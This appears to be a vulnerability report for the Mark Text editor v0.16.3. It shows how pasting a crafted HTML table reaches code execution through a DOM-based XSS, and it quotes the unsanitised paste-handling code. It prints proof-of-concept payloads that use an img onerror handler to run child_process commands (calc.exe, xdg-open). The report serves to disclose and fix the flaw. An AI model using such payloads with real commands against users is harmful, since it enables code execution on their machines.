Security issue: DOM based XSS & RCE - from pasting vulnerable HTML

[luiseok]

Description

An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script.

marktext/src/muya/lib/contentState/pasteCtrl.js

Lines 44 to 65 in b029938

	ContentState.prototype.checkCopyType = function (html, text) {
	let type = 'normal'
	if (!html && text) {
	type = 'copyAsMarkdown'
	const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim())
	if (match && match[1]) {
	const tag = match[1]
	if (tag === 'table' && match.length === 3 && match[2] === 'table') {
	// Try to import a single table
	const tmp = document.createElement('table')
	tmp.innerHTML = text
	if (tmp.childElementCount === 1) {
	return 'htmlToMd'
	}
	}
	// TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX.
	type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type
	}
	}
	return type
	}

• Can you reproduce the issue?

Steps to reproduce

1. Copy the vulnerable HTML code
   • <table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
2. Paste it into Mark Text app

Expected behavior:

HTML should be sanitized before pasted into DOM.

Actual behavior:

No HTML sanitize procedure. Only checks if it's wrapped with <table> or not.

Link to an example: [optional]

bandicam.2022-02-08.01-33-25-900-cut.mp4

bandicam.2022-02-08.01-33-25-900.mp4

Versions

• MarkText version: v0.16.3
• Operating system:
  Windows 11 Version 21H2 - OS Build 22000.469
  Kali Linux Kali GNU/Linux Rolling 2021.4